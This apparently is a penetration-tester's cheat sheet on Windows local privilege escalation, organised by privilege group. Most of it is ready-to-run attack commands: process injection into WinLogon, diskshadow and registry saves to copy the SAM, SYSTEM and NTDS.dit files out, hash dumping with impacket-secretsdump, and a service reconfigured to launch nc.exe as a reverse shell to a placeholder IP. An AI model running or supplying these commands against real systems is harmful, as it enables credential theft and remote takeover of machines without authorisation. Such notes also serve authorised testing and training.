Skip to main content

Windows Local Privilege Escalation

SeDebugPrivilege

Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt.

WinLogon PID: 3488

Adopt binary: adopt.exe

PS /home/bobbuilderbob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

SeImpersonatePrivilege

Usually Web (IIS) has this enabled.

  • GodPotato, printerspoofer to Privesc.

BackupOperators

PS /home/bobbuilderbob> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt

Through Evil-Winrm (to upload/download files)

PS /home/bobbuilderbob> upload disk.txt C:\Windows\Temp\disk.txt
PS /home/bobbuilderbob> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /home/bobbuilderbob> E:
PS /home/bobbuilderbob> reg save hklm\system c:\windows\temp\system.bak
PS /home/bobbuilderbob> reg save hklm\sam c:\windows\temp\sam.bak
PS /home/bobbuilderbob> upload ./SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilderbob> upload ./SeBackupPrivilegeUtils.dll
PS /home/bobbuilderbob> Import-Module .\SeBackupPrivilegeUtils.dll
PS /home/bobbuilderbob> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilderbob> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /home/bobbuilderbob> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak

Then on your linux machine you use the 3 files you downloaded to dump the hashes

bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lnhash:nthash LOCAL -outputfile ntlm-extract

Server Operators

bobbuilder:/home# upload /usr/share/windows-resources/binaries/nc.exe
PS /home/bobbuilderbob> sc.exe config vss binPath="C:\Path\nc.exe -e cmd.exe ip 1234"
PS /home/bobbuilderbob> sc.exe stop vss
PS /home/bobbuilderbob> sc.exe start vss